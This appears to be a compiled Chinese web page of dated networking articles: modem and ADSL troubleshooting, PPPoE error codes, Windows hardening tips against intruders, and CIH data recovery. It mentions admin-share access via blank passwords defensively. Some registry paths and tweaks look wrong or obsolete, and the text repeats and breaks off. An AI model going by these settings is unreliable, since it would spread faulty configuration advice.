
返回总目录

网卡故障

◎Novell双网卡的使用问题
◎NT网卡和Novell网卡互用
◎解决网卡“记忆效应”惹出断网问题
◎局域网故障排除的经验之谈网卡是关键
◎如何实现多网卡bonding
◎双网卡的安装与设置
◎为服务器添加多块网卡
◎我的网卡怎么了？
◎修改网卡物理地址的方法
◎用单网卡连接两个网段
◎在Linux下配置网卡

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


“猫”之加速终极篇

《一键清理系统垃圾》

返回总目录 目录页 下一页

“猫”之加速终极篇

拨号上网，无可奈何。欲速惰猫，软硬兼施。
一、外功
1.给内猫打制一个铁壳，同时接地，形成电磁波的屏障。
2.尽量缩短Modem接口与电话插座间电话线的长度，采用优质线。
3.如有可能，再申请一条电话线，加装第二只猫，利用Win98的特性，双猫同时上网，效果意想不到。

二、内力
1.将文件系统设置为“网络服务器”，提升网上性能。
2.将Modem设置中的发送与接收端口都调到最大，在高级设置中使用“硬件”，并在附加设置中加入：%c0，以关闭压缩；S11=50，以将DTMF拨号速度提到最快；S10=50，以防止意外掉线。
3.在SYSTEM.INI文件的[386Enh]项中加入Com?buffer=2048，“?”为你的Modem串口号，有64兆以上内存的可设为4096。
4.不选择拨号网络属性中的“登录到网络”、“NetBEUI”、“IPX/SPX Compatible”三项，提升网络登录速度。
5.将浏览器的缓存调到最大，最好是先划出一块150兆的硬盘空间，专用作缓存。
6.修改注册表：
⑴在/HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Class/NetTrans/0000增加MaxMTU=576或1152，MaxMTU即最大的TCP/IP传输单元，Internet上把应用程序要传输的数据分割为较小的分组进行传输。
⑵在/HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/Vxd/MSTCP中增加串值：
①DefaultRcvWindow=? 缺省的传输单元接收缓冲区的大小，“?”最好是512字节的4-12倍，视Modem的最大速度而定，我认为设成64000效果也不错。
②DefaultTTL=? TCP/IP分组的寿命，加大分组的寿命值可使分组传输到更远的目的地。 “?”设为255较好。
③NameSrvQueryTimeout=3000 域名服务器超时计数，如果在计数值的时间内没有收到域名服务器的回应，本机的请求将重发或作超时错误处理。
④MaxSSS=? 分组中待传数据的大小，由于要除去地址信息，“?”应比MaxMTU值少40。
⑤字符串值PMTUBlackHoleDetect=1与字符串值PMTUDiscovery=1 打开MTU自动侦察。
⑶在/HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/Vxd/NWLink/Ndi/params下建主键cachesize，设默认值为16；建主键maxsockets，其下建字符串max=1020。
7.使用NetSonic Pro软件，可记录访问过的网页，绝对有效。

好了，内外兼修，大功告成。我那33.6K的老猫下载能稳定在4K上下，不错吧。


ADSL拨号中出现的错误代码

《一键清理系统垃圾》

ADSL拨号中出现的错误代码

Error 602 The port is already open

问题：拨号网络网络由于设备安装错误或正在使用，不能进行连接

原因：RasPPPoE没有完全和正确的安装

解决：卸载干净任何PPPoE软件，重新安装

Error 605 Cannot set port information

问题：拨号网络网络由于设备安装错误不能设定使用端口

原因：RasPPPoE没有完全和正确的安装

解决：卸载干净任何PPPoE软件，重新安装

Error 606 The port is not connected

问题：拨号网络网络不能连接所需的设备端口

原因：RasPPPoE没有完全和正确的安装，连接线故障，ADSL MODEM故障

解决：卸载干净任何PPPoE软件，重新安装，检查网线和 ADSL MODEM

Error 608 The device does not exist

问题：拨号网络网络连接的设备不存在

原因：RasPPPoE没有完全和正确的安装

解决：卸载干净任何PPPoE软件，重新安装

Error 609 The device type does not exist

问题：拨号网络网络连接的设备其种类不能确定

原因：RasPPPoE没有完全和正确的安装

解决：卸载干净任何PPPoE软件，重新安装

Error 611 The route is not available/612 The route is not allocated

问题：拨号网络网络连接路由不正确

原因：RasPPPoE没有完全和正确的安装，ISP服务器故障

解决：卸载干净任何PPPoE软件，重新安装，致电ISP询问

Error 617 The port or device is already disconnecting

问题：拨号网络网络连接的设备已经断开

原因：RasPPPoE没有完全和正确的安装，ISP服务器故障，连接线，ADSL MODEM故障

解决：卸载干净任何PPPoE软件，重新安装，致电ISP询问 ，检查网线和 ADSL MODEM

Error 619

问题：与ISP服务器不能建立连接

原因：ADSL ISP服务器故障，ADSL电话线故障

解决：检查ADSL信号灯是否能正确同步。致电ISP询问

Error 621 Cannot open the phone book file

Error 622 Cannot load the phone book file

Error 623 Cannot find the phone book entry

Error 624 Cannot write the phone book file

Error 625 Invalid information found in the phone book

问题：Windows NT或者Windows 2000 Server网络RAS网络组件故障

原因：软件安装问题

解决：卸载所有PPPoE软件，重新安装RAS网络组件和RasPPPoE

Error 630

问题：ADSL MODEM没有没有响应

原因：ADSL电话线故障，ADSL MODEM故障（电源没打开等）

解决：检查ADSL设备

Error 633

问题：拨号网络网络由于设备安装错误或正在使用，不能进行连接

原因：RasPPPoE没有完全和正确的安装

解决：卸载干净任何PPPoE软件，重新安装

Error 638

问题：过了很长时间，无法连接到ISP的ADSL接入服务器

原因：ISP服务器故障；在RasPPPoE所创建的不好连接中你错误的输入了一个电话号码

解决：运行其创建拨号的Raspppoe.exe检查是否能列出ISP服务，以确定ISP正常;把所使用的拨号连接中的 电话号码清除或者只保留一个0。

Error 645

问题：网卡没有正确响应

原因：网卡故障，或者网卡驱动程序故障

解决：检查网卡，重新安装网卡驱动程序

Error 650

问题：远程计算机没有响应，断开连接

原因：ADSL ISP服务器故障，网卡故障，非正常关机造成网络协议出错

解决：检查ADSL信号灯是否能正确同步，致电ISP询问；检查网卡，删除所有网络组件重新安装 网络。

Error 651

问题：ADSL MODEM报告发生错误

原因：Windows处于安全模式下，或其他错误

解决：出现该错误时，进行重拨，就可以报告出新的具体错误代码

Error 691

问题：输入的用户名和密码不对，无法建立连接

原因：用户名和密码错误，ISP服务器故障

解决：使用正确的用户名和密码，并且使用正确的ISP账号格式(name@service),致电ISP询问。

Error 718

问题：验证用户名时远程计算机超时没有响应，断开连接

原因：ADSL ISP服务器故障

解决：致电ISP询问

Error 720

问题：拨号网络无法协调网络中服务器的协议设置

原因：ADSL ISP服务器故障，非正常关机造成网络协议出错

解决：致电ISP询问，删除所有网络组件重新安装网络。

Error 734

问题：PPP连接控制协议中止

原因：ADSL ISP服务器故障，非正常关机造成网络协议出错

解决：致电ISP询问，删除所有网络组件重新安装网络。

Error 738

问题：服务器不能分配IP地址

原因：ADSL ISP服务器故障，ADSL用户太多超过ISP所能提供的IP地址

解决：致电ISP询问

Error 797

问题：ADSL MODEM连接设备没有找到

原因：ADSL MODEM电源没有打开，网卡和ADSL MODEM的连接线出现问题，软件安装以后相应的协议没有正确邦定，在创立拨号连接时，建立了错误的空连接

解决：检查电源，连接线；检查网络属性，RasPPPoE相关的协议是否正确的安装并正确邦定（相关协议），检查网卡是否出现?号或!号，把它设置为Enable;检查拨号连接的属性，是否连接的设备使用了一个“ISDN channel-Adapter Name(xx)” 的设备，该设备为一个空设备，如果使用了取消它，并选择 正确的PPPoE设备代替它，或者重新创立拨号连接。


ADSL常见故障全接触

《一键清理系统垃圾》

ADSL常见故障全接触

    最近，本人听闻在使用ADSL宽带上网时常有时间栏里显示连接完成的小电脑图标突然擅自消失？！这个问题是个别现象，但反映出了朋友们在遇到ADSL上网困难的时候无从下手。现在借这个机会，把使用ADSL宽带遇到问题时常用的解决办法公布一下，相信总有一款适合你。

    小知识

    现在的ADSL一般采用两种接入方式：虚拟拨号，也就是用ADSL“猫”(虚拟)拨号，拨号时和普通的56k“猫”拨号相似，IP自动分配；专线ADSL接入，用静态IP。

    ★软件

    有的操作系统可能对ADSL的相关组件存在兼容性问题，以Windows 98为例，它的网络组件存在重大缺陷，上网时都会出现莫名其妙的断流问题。遇到这种情况最好的解决方法是给系统打补丁，你可以直接连接到Microsoft Update站点，选择系统搜索到的补丁下载。待补丁安装完成后，再安装虚拟拨号软件。

    ADSL使用的是PPPoE(Point-to-Point Protocol over Ethernet，以太网上的点对点协议)虚拟拨号软件，而这些虚拟拨号软件有各自的缺点。建议大家使用Windows XP自带的PPPoE拨号软件，经过多方测试，使用自带的虚拟拨号软件断流现象较少；稳定性也相对提高。如果使用的是Windows 9x/Me，可选EnterNet、WinPoET和RasPPPoE。其中，EnterNet是现在比较常用的一款，EnterNet300适用于Windows 9x；EnterNet500适用于Windows 2000/XP。出现问题时，可以试着换用其他的虚拟拨号软件。

    ★硬件

    硬件故障可能由于ADSL使用地离电信局太远(2.5公里以上)，你可以和当地的电信部门联系，并协调解决问题。其次，可能是线路连接不正确，不同的话音分离器的连接方法有所不同，请务必按照说明书指引正确连接。再次，确保线路通讯质量良好没有被干扰，没有连接其它会造成线路干扰的设备，例如电话分机、传真机等，手机一定不要放在ADSL Modem的旁边，因为每隔几分钟手机会自动查找网络，这时强大的电磁波干扰足以造成ADSL Modem断流。最后，检查接线盒和水晶头有没有接触不良以及是否与其他电线串绕在一起，有条件最好用标准电话线，如果是符合ITU(国际电信联盟)标准的三类、五类或超五类双绞线更好。电话线入户后就分开走。一线走电话、一线走电脑。如果一定要用分线盒，最好选用质量好的。电脑接ADSL Modem的线用ADSL Modem附带的双绞线。

    友情提示

    ADSL Modem也分为USB接口和LAN(RJ-45水晶头)两种形式，前者需要安装驱动，后者不需要，但设置方法都类似。

    ★被黑

    虽然受到黑客和病毒的攻击可能性较小，但也不排除可能性。病毒如果破坏了ADSL相关组件也会有类似的情况发生，通常的表现是：ADSL不稳定，速度变动很大，容易掉线等等。使用虚拟拨号上网方式，虽然名义上是动态IP，但如前面所说的，是在一个固定的IP段内，而且从上线后到断线的整个过程中IP不变，这就让黑客有机可乘。建议安装“天网防火墙”或者“金山网镖”网络防火墙，它们都可以实时监控你的计算机和网络的通讯情况，并警告提示莫名的网络访问方式，有效地杜绝了受攻击的危险性。


ADSL常见经典故障大全

《一键清理系统垃圾》

ADSL常见经典故障大全

    ADSL是运行在原有电话线上的一种高速宽带上网方式，它具有节省投资、上网速度快、安装简单等优点。目前很多局域网尤其是网吧都使用这种方式。当然用这种方式上网的故障也比较多，下面就为大家谈谈ADSL故障的排解方法与实例。
    造成ADSL故障的因素
    ADSL常见的硬件故障大多数是接头松动、网线断、集线器损坏和计算机系统故障等方面的问题。一般都可以通过观察指示灯来帮助定位。
    此外，电压不正常、温度过高、雷击等也容易造成故障。电压不稳定的地方最好为Modem配小功率UPS，Modem应保持干燥通风、避免水淋、保持清洁。遇雷雨天气时，务必将Modem电源和所有连线拔下。Modem损坏如果指示灯不亮，或只有一个灯亮，或更换网线、网卡之后10Base-T灯仍不亮，则表明Modem已损坏。
    线路距离过长、线路质量差、连线不合理，也是造成ADSL不能正常使用的原因。其表现是经常丢失同步、同步困难或一贯性速度很慢。解决的方法是：将需要并接的设备如电话分机、传真、普通Modem等放到分线器的PHONE口以后：检查所有接头接触是否良好，对质量不好的户线应改造或更换。
    定位ADSL故障的基本方法
    ADSL的故障定位需要一定的经验，一般原则是：留心指示灯和报错信息，先硬件后软件，先内部后外部，先本地后外网，先试主机后查客户，充分检查后再申报。故障的申报应该准确简洁，应尽量将遇到的问题与用户手册上提到的故障相对应。向机房报故障时，应根据用户手册首先报出端口编号和用户名。对经常性的故障，用户应进行记录，并在申报时提及。
    1.检查电源指示灯是否正常
    电源指示灯位于用户Modem 3个指示灯的最左边，持续点亮为正常，如电源指示灯不亮，用户可自行解决电源问题。
    2.数据指示灯是否正常
    数据指示灯位于用户Modem 3个指示灯靠右边的两个，持续点亮为正常，说明用户端至DSLAM局端线路无故障：如该指示灯不亮，说明线路有问题，需由电信部门现场解决。
    3.用户是否自行改动IP地址
    每个用户PC均有其固定IP地址，如用户改动其地址，则电信部门可提供其PC的IP地址，把IP地址重新改回来即可。
    4.用户网卡、网线是否正常
    用户PC网卡经网线连接Modem后，其指示灯会闪亮，如该指示灯不能正常闪亮，说明用户网卡或网线有故障。
    如果以上各项均正常，用户仍不能上网，则需由ISP的技术人员现场解决。
    故障诊断处理实例
    1.局域网上的计算机无法使用PPPoE
    [故障现象]
    一台ADSL连接所使用的是10/100Mb/s的HUB，而在局域网上的计算机却无法使用PPPoE。
    [故障分析处理]
    ADSL使用的是10Base-T标准即10Mb/s，它连接10/100Mb/s的HUB是不会有问题的，但是如果计算机和HUB的连接速度是100Mb/s，HUB的10/100Mb/s交换模块目前对PPPoE支持并不是很好，那么PPPoE就有可能无法在100Mb/s网速下找到ADSL信号，就不能使用了。解决办法就是用于PPPoE拨号的计算机使用10Mb/s的接线方法制作10Mb/s网线，或者将网卡强行设置工作在10Mb/s速度。
    2.数据流量大时出现死机
     [故障现象]
     一台ADSL，当数据流量增大时就会死机。
    [故障分析处理]
    一般情况下，这是因为网卡的品质或者兼容性不好所引起，特别是老式ISA总线IOM网卡，由于PPPoE是比较新的一项技术，这类网卡兼容性可能会有问题，并且速度较慢，造成冲突，最终线路锁死，甚至死机。
    3.安装PPPoE后启动速度变慢
    [故障现象]
    安装了ADSL的PPPoE软件以后电脑启动速度慢了。
    [故障分析处理]
    这和网卡设置有问题有关，由于系统启动时需要一个合法的IP，局域网中需要正确设置DHCP服务器，如果是单机使用就给网卡指定一个IP，便可以解决问题，例如：192.168.xxx.xxx，子网掩码：255.255.255.0。
    4.不能列出ISP的服务项目
    [故障现象]
    PPPoE软件安装和工作都正常，但不能列出ISP的服务项目。
    [故障分析处理]
    首先检查硬件的连接是否正确，ISP是否在提供服务，这些可以通过观察ADSL Modem同步工作灯显示状态来判断，如果同步工作灯显示正常工作，那就检查计算机内其他设备是否干扰了ADSL的工作，并且将驱动程序升级。还需要注意的一点就是ISP是否开通了相应的服务，由于ADSL还有一些特殊编号捆绑在电话交换机中，ISP需要认证了这些编号后才能视为用户的线路合法可用；还有ISP的ADSL接入服务器没开，也不可能列出服务器项目。
    5.ADSL上网速度慢
    [故障现象]
    有时候ADSL访问速度并不比普通拨号Modem快多少。
    [故障分析处理]
    造成ADSL访问速度慢的原因主要有：
    1)如果访问国外站点，访问会受到出口带宽及对方站点配置情况等因素的影响。
    2)ADSL技术对电话线路的质量要求较高，且目前采用的ADSL是一种RADSL (速率自适应ADSL)，如果电话局所在楼到用户间的电话线路在某段时间受到外在因素的干扰，RADSL会根据线路质量的优劣和传输距离的远近动态地调整用户的访问速度。
    6.有时不能联网
    [故障现象]
    ADSL有时不能正常上网。
    [故障分析处理]
    ADSL是一种基于双绞线传输的技术，双绞线是将两条绝缘的铜线以一定的规律互相缠在一起，这样可以有效抵御外界的电磁场干扰。大多电话线是平行线，从电话公司接线盒到用户电话这段线大多用的是平行线，这对ADSL传输非常不利，过长的非双绞线传输会造成连接不稳定、ADSL灯闪烁等现象，从而影响上网。由于ADSL是在普通电话线的低频语音上叠加高频数字信号，所以从电话公司到ADSL滤波器这段连接中任何设备的加入都将危害到数据的正常传输，因此在滤波器之前不要并接电话、电话防盗器等设备。
    7.ADSL的指示灯都正常但仍然掉网
    [故障现象]
    一台ADSL的指示灯为绿色，但也发生掉线现象，且重新启动Modem后就好了。
    [故障分析处理]
    这种情况多发生在没有代理服务器，没有做防火墙或没有路由器的网络用户上。这是因为在ADSLModem上有个“lOBase-T”口，这个口是接局域网的HUB口。虽然是10Mb/s的端口，但是ADSL的上行带宽只有几百kb/s。如果用户局域网内部是ADSL直接接HUB，HUB再接下面的客户机，网络内的许多与ADSL无关的数据包将占用ADSL上行通道，ADSL也无法控制局域网内的广播风暴；如果超过ADSL上行传输能力，数据包将装入ADSL的缓存；如果数据量继续增大，缓存溢出，则造成ADSL“休眠”现象。这样只有重新启动Modem了。解决办法是做一台双网卡的代理服务器，这样可以隔断Modem与局域网之间的直接通信，避免上述问题。
    8.虚拟拨号失败
    [故障现象]
    ADSL在使用虚拟拨号软件时提示错误信息，拨号失败。
    [故障分析处理]
    如果拨号窗口显示“Begin Negotiation”然后等待，最后直接弹出菜单“time out”，这种情况表明网络不通。主要原因是ADSL上的10Base-T端口上的网线没有连接好或ADSL网络不通，可以重启ADSL后再试。如果拨号窗口显示“Begin Negotiation”，然后显示“Authenticating”，最后显示“Authentication Failed”，这种情况表明用户账号或密码有误。如果拨号窗口显示“Begin Negotiation”，然后显示“Authenticating”，然后再显示“Receiving Network Parameter”，最后弹出菜单“timeout”，这种情况表明拨号IP地址已经被占满，需稍后再拨。

作者：DIY
来源：中国电脑教育报


ADSL防御黑客攻击的十大办法

《一键清理系统垃圾》

ADSL防御黑客攻击的十大办法

    目前，使用ADSL的用户越来越多，由于ADSL用户在线时间长、速度快，因此成为黑客们的攻击目标。现在网上出现了各种越来越详细的“IP地址库”，要知道一些ADSL用户的IP是非常容易的事情。要怎么保卫自己的网络安全呢？不妨看看以下方法。

    一、取消文件夹隐藏共享

    如果你使用了Windows 2000/XP系统，右键单击C盘或者其他盘，选择"共享"，你会惊奇地发现它已经被设置为“共享该文件夹”，而在“网上邻居”中却看不到这些内容，这是怎么回事呢？

    原来，在默认状态下，Windows 2000/XP会开启所有分区的隐藏共享，从“控制面板/管理工具/计算机管理”窗口下选择“系统工具/共享文件夹/共享”，就可以看到硬盘上的每个分区名后面都加了一个“$”。但是只要键入“\\计算机名或者IP\C$”，系统就会询问用户名和密码，遗憾的是，大多数个人用户系统Administrator的密码都为空，入侵者可以轻易看到C盘的内容，这就给网络安全带来了极大的隐患。

    怎么来消除默认共享呢？方法很简单，打开注册表编辑器，进入“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Sevices
\Lanmanworkstation\parameters”，新建一个名为“AutoShareWKs”的双字节值，并将其值设为“0”，然后重新启动电脑，这样共享就取消了。

    二、拒绝恶意代码

    恶意网页成了宽带的最大威胁之一。以前使用Modem，因为打开网页的速度慢，在完全打开前关闭恶意网页还有避免中招的可能性。现在宽带的速度这么快，所以很容易就被恶意网页攻击。

    一般恶意网页都是因为加入了用编写的恶意代码才有破坏力的。这些恶意代码就相当于一些小程序，只要打开该网页就会被运行。所以要避免恶意网页的攻击只要禁止这些恶意代码的运行就可以了。

    运行IE浏览器，点击“工具/Internet选项/安全/自定义级别”，将安全级别定义为“安全级-高”，对“ActiveX控件和插件”中第2、3项设置为“禁用”，其它项设置为“提示”，之后点击“确定”。这样设置后，当你使用IE浏览网页时，就能有效避免恶意网页中恶意代码的攻击。

    三、封死黑客的“后门”

    俗话说“无风不起浪”，既然黑客能进入，那说明系统一定存在为他们打开的“后门”，只要堵死这个后门，让黑客无处下手，便无后顾之忧！

    1.删掉不必要的协议

    对于服务器和主机来说，一般只安装TCP/IP协议就够了。鼠标右击“网络邻居”，选择“属性”，再鼠标右击“本地连接”，选择“属性”，卸载不必要的协议。其中NETBIOS是很多安全缺陷的根源，对于不需要提供文件和打印共享的主机，还可以将绑定在TCP/IP协议的NETBIOS关闭，避免针对NETBIOS的攻击。选择“TCP/IP协议/属性/高级”，进入“高级TCP/IP设置”对话框，选择“WINS”标签，勾选“禁用TCP/IP上的NETBIOS”一项，关闭NETBIOS。

    2.关闭“文件和打印共享”

    文件和打印共享应该是一个非常有用的功能，但在不需要它的时候，也是黑客入侵的很好的安全漏洞。所以在没有必要“文件和打印共享”的情况下，我们可以将它关闭。用鼠标右击“网络邻居”，选择“属性”，然后单击“文件和打印共享”按钮，将弹出的“文件和打印共享”对话框中的两个复选框中的钩去掉即可。

    虽然“文件和打印共享”关闭了，但是还不能确保安全，还要修改注册表，禁止它人更改“文件和打印共享”。打开注册表编辑器，选择“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NetWork”主键，在该主键下新建DWORD类型的键值，键值名为“NoFileSharingControl”，键值设为“1”表示禁止这项功能，从而达到禁止更改“文件和打印共享”的目的；键值为“0”表示允许这项功能。这样在“网络邻居”的“属性”对话框中“文件和打印共享”就不复存在了。

    3.把Guest账号禁用

    有很多入侵都是通过这个账号进一步获得管理员密码或者权限的。如果不想把自己的计算机给别人当玩具，那还是禁止的好。打开控制面板，双击“用户和密码”，单击“高级”选项卡，再单击“高级”按钮，弹出本地用户和组窗口。在Guest账号上面点击右键，选择属性，在“常规”页中选中“账户已停用”。另外，将Administrator账号改名可以防止黑客知道自己的管理员账号，这会在很大程度上保证计算机安全。

    4.禁止建立空连接

    在默认的情况下，任何用户都可以通过空连接连上服务器，枚举账号并猜测密码。因此，我们必须禁止建立空连接。方法有以下两种：

    方法一是修改注册表：打开注册表“HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA”，将DWORD值“RestrictAnonymous”的键值改为“1”即可。

    最后建议大家给自己的系统打上补丁，微软那些没完没了的补丁还是很有用的！

    四、隐藏IP地址

    黑客经常利用一些网络探测技术来查看我们的主机信息，主要目的就是得到网络中主机的IP地址。IP地址在网络安全上是一个很重要的概念，如果攻击者知道了你的IP地址，等于为他的攻击准备好了目标，他可以向这个IP发动各种进攻，如DoS(拒绝服务)攻击、Floop溢出攻击等。隐藏IP地址的主要方法是使用代理服务器。

    与直接连接到Internet相比，使用代理服务器能保护上网用户的IP地址，从而保障上网安全。代理服务器的原理是在客户机（用户上网的计算机）和远程服务器（如用户想访问远端WWW服务器）之间架设一个“中转站”，当客户机向远程服务器提出服务要求后，代理服务器首先截取用户的请求，然后代理服务器将服务请求转交远程服务器，从而实现客户机和远程服务器之间的联系。很显然，使用代理服务器后，其它用户只能探测到代理服务器的IP地址而不是用户的IP地址，这就实现了隐藏用户IP地址的目的，保障了用户上网安全。提供免费代理服务器的网站有很多，你也可以自己用代理猎手等工具来查找。

    五、关闭不必要的端口

    黑客在入侵时常常会扫描你的计算机端口，如果安装了端口监视程序（比如Netwatch），该监视程序则会有警告提示。如果遇到这种入侵，可用工具软件关闭用不到的端口，比如，用“Norton Internet Security”关闭用来提供网页服务的80和443端口，其他一些不常用的端口也可关闭。

    六、更换管理员帐户

    Administrator帐户拥有最高的系统权限，一旦该帐户被人利用，后果不堪设想。黑客入侵的常用手段之一就是试图获得Administrator帐户的密码，所以我们要重新配置Administrator帐号。

    首先是为Administrator帐户设置一个强大复杂的密码，然后我们重命名Administrator帐户，再创建一个没有管理员权限的Administrator帐户欺骗入侵者。这样一来，入侵者就很难搞清哪个帐户真正拥有管理员权限，也就在一定程度上减少了危险性。

    七、杜绝Guest帐户的入侵

    Guest帐户即所谓的来宾帐户，它可以访问计算机，但受到限制。不幸的是，Guest也为黑客入侵打开了方便之门！网上有很多文章中都介绍过如何利用Guest用户得到管理员权限的方法，所以要杜绝基于Guest帐户的系统入侵。

    禁用或彻底删除Guest帐户是最好的办法，但在某些必须使用到Guest帐户的情况下，就需要通过其它途径来做好防御工作了。首先要给Guest设一个强壮的密码，然后详细设置Guest帐户对物理路径的访问权限。举例来说，如果你要防止Guest用户可以访问tool文件夹，可以右击该文件夹，在弹出菜单中选择“安全”标签，从中可看到可以访问此文件夹的所有用户。删除管理员之外的所有用户即可。或者在权限中为相应的用户设定权限，比方说只能“列出文件夹目录”和“读取”等，这样就安全多了。

    八、安装必要的安全软件

    我们还应在电脑中安装并使用必要的防黑软件，杀毒软件和防火墙都是必备的。在上网时打开它们，这样即便有黑客进攻我们的安全也是有保证的。

    九、防范木马程序

    木马程序会窃取所植入电脑中的有用信息，因此我们也要防止被黑客植入木马程序，常用的办法有：

    ● 在下载文件时先放到自己新建的文件夹里，再用杀毒软件来检测，起到提前预防的作用。

    ● 在“开始”→“程序”→“启动”或“开始”→“程序”→“Startup”选项里看是否有不明的运行项目，如果有，删除即可。

    ● 将注册表里 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下的所有以“Run”为前缀的可疑程序全部删除即可。

    十、不要回陌生人的邮件

    有些黑客可能会冒充某些正规网站的名义，然后编个冠冕堂皇的理由寄一封信给你要求你输入上网的用户名称与密码，如果按下“确定”，你的帐号和密码就进了黑客的邮箱。所以不要随便回陌生人的邮件，即使他说得再动听再诱人也不上当。

    做好IE的安全设置

    ActiveX控件和 Applets有较强的功能，但也存在被人利用的隐患，网页中的恶意代码往往就是利用这些控件编写的小程序，只要打开网页就会被运行。所以要避免恶意网页的攻击只有禁止这些恶意代码的运行。IE对此提供了多种选择，具体设置步骤是：“工具”→“Internet选项”→“安全”→“自定义级别”，建议您将ActiveX控件与相关选项禁用。谨慎些总没有错！

    另外，在IE的安全性设定中我们只能设定Internet、本地Intranet、受信任的站点、受限制的站点。不过，微软在这里隐藏了“我的电脑”的安全性设定，通过修改注册表把该选项打开，可以使我们在对待ActiveX控件和 Applets时有更多的选择，并对本地电脑安全产生更大的影响。

    下面是具体的方法：打开“开始”菜单中的“运行”，在弹出的“运行”对话框中输入Regedit.exe，打开注册表编辑器，点击前面的“+”号顺次展开到：HKEY_CURRE-NT_USER\Software\Microsoft\Windows\CurrentVersion\InternetSettings\Zones\0，在右边窗口中找到DWORD值“Flags”，默认键值为十六进制的21(十进制33)，双击“Flags”，在弹出的对话框中将它的键值改为“1”即可，关闭注册表编辑器。无需重新启动电脑，重新打开IE，再次点击“工具→Internet选项→安全”标签，你就会看到多了一个“我的电脑”图标，在这里你可以设定它的安全等级。将它的安全等级设定高些，这样的防范更严密。


拯救遭破坏的数据

《一键清理系统垃圾》

拯救遭破坏的数据

《中国电脑教育报》南楠

    CIH病毒是一种能够破坏计算机系统硬件的恶性病毒。它产自中国台湾，最早随光盘在欧美等地广泛传播，随后进一步通过Internet传播到全世界各个角落。目前传播的主要途径是通过Internet和电子邮件。CIH病毒只感染Windows 95/98操作系统。一般人认为CIH发作在4月26日，其实CIH病毒每月26日都会爆发。CIH病毒发作时，一方面会全面破坏计算机系统硬盘上的数据，另一方面将对某些计算机主板的BIOS进行改写。BIOS被改写后，系统则无法启动。CIH病毒已被认定是首例能够破坏计算机系统硬件的病毒，同时也是最具杀伤力的恶性病毒。

    如不小心感染了CIH病毒，数据遭到了破坏，可以尝试一下冠群联想公司的FinalData进行数据恢复。

    感染了CIH病毒，会将乱码覆盖硬盘初始位置的2048个扇区。而这些扇区存储的就是我们硬盘的主引导记录（MBR）、系统隐藏扇区、分区表以及引导分区（通常为C盘）的文件分配表（FAT表）等重要内容。我们知道当硬盘的这些关键内容被破坏之后，计算机不能正常启动，所以想读取原先保存的数据是根本不可能的，此外由于逻辑分区信息也被破坏，即使把硬盘拆下来挂到其他正常的计算机上，也不能直接读取这块盘上的任何数据。

    但是由于被CIH覆盖的只是系统引导信息、分区信息和C盘上的文件索引信息，保存在硬盘上的实际数据并没有受到直接的破坏。如果使用FinalData则可以读取到硬盘的实际数据，因为FinalData的恢复机制是可以略过系统信息和索引信息、直接访问实际数据，然后就可以较轻松地把实际数据读取出来备份到其他硬盘。具体做法如下：

    由于计算机已经无法引导，需要把硬盘拆下来作为一个非引导盘挂到一个正常的、装有FinalData的计算机上。

    图1

    由于该硬盘的分区表已被破坏，所以从资源管理器等工具是看不到该块硬盘上的逻辑分区信息的。此时启动FinalData，通过选择物理驱动器的方式选择该硬盘，然后使用“查找格式”功能，发现目标分区，对目标分区进行扫描（如图1）。

    将目标分区中发现的目录和文件备份到本地硬盘上，完成对该分区的数据恢复（如图2）。

    图2

    FinalData的操作方式非常简单的，操作过程中看到的是目录、文件等我们比较熟悉的内容，而非簇、扇区、二进制标志等底层信息。您可能会问为什么不能将目标盘修复到和以前一模一样呢？而只是把受损硬盘上的数据读取出来，备份到其他硬盘，实际上这正是FinalData非同一般的安全性的体现。FinalData在整个恢复操作过程中对目标磁盘完全是一种只读性操作，没有对其进行任何修改。这样即使在恢复过程中有误操作或者恢复不成功，至少不会对硬盘造成进一步的破坏。反之，如果是通过对目标盘的直接修补的方式试图恢复数据。这类操作如果完全成功，那么丢失的数据能够马上在本地重现。但是这也是非常危险的，因为一般人不可能完全清楚硬盘受损前的分区实际大小、物理起始位置等详细信息，所以修复本身是一种尝试性的工作，当修复不成功时，不但不能恢复数据，还会对数据造成进一步的破坏，使后续的恢复工作变得更加困难。此外，目前的修复方法大部分只能恢复除C盘外的其他分区的内容（因为只有C盘的FAT表遭到了破坏）。而FinalData能够对所有分区都进行恢复。这也是我们推荐使用FinalData进行恢复被CIH破坏的数据的原因之一。

    如果需要尝试使用FinalData进行数据恢复，可以到冠群联想软件公司的网站：www.ca-legend.com.cn下载免费试用版，并可得到数据恢复专家的建议。


ADSL上网常见问题集锦

《一键清理系统垃圾》

ADSL上网常见问题集锦

Error 602 The port is already open
问题：拨号网络网络由于设备安装错误或正在使用，不能进行连接
原因：RasPPPoE没有完全和正确的安装
解决：卸载干净任何PPPoE软件，重新安装
Error 605 Cannot set port information
问题：拨号网络网络由于设备安装错误不能设定使用端口
原因：RasPPPoE没有完全和正确的安装
解决：卸载干净任何PPPoE软件，重新安装
Error 606 The port is not connected
问题：拨号网络网络不能连接所需的设备端口
原因：RasPPPoE没有完全和正确的安装，连接线故障，ADSL MODEM故障
解决：卸载干净任何PPPoE软件，重新安装，检查网线和 ADSL MODEM
Error 608 The device does not exist
问题：拨号网络网络连接的设备不存在
原因：RasPPPoE没有完全和正确的安装
解决：卸载干净任何PPPoE软件，重新安装
Error 609 The device type does not exist
问题：拨号网络网络连接的设备其种类不能确定
原因：RasPPPoE没有完全和正确的安装
解决：卸载干净任何PPPoE软件，重新安装
Error 611 The route is not available/612 The route is not allocated
问题：拨号网络网络连接路由不正确
原因：RasPPPoE没有完全和正确的安装，ISP服务器故障
解决：卸载干净任何PPPoE软件，重新安装，致电ISP询问
Error 617 The port or device is already disconnecting
问题：拨号网络网络连接的设备已经断开
原因：RasPPPoE没有完全和正确的安装，ISP服务器故障，连接线，ADSL MODEM故障 解决：卸载干净任何PPPoE软件，重新安装，致电ISP询问 ，检查网线和 ADSL MODEM
Error 619 问题：与ISP服务器不能建立连接
原因：ADSL ISP 服务器故障，ADSL电话线故障
解决：检查ADSL信号灯是否能正确同步。致电ISP询问
Error 621 Cannot open the phone book file
Error 622 Cannot load the phone book file
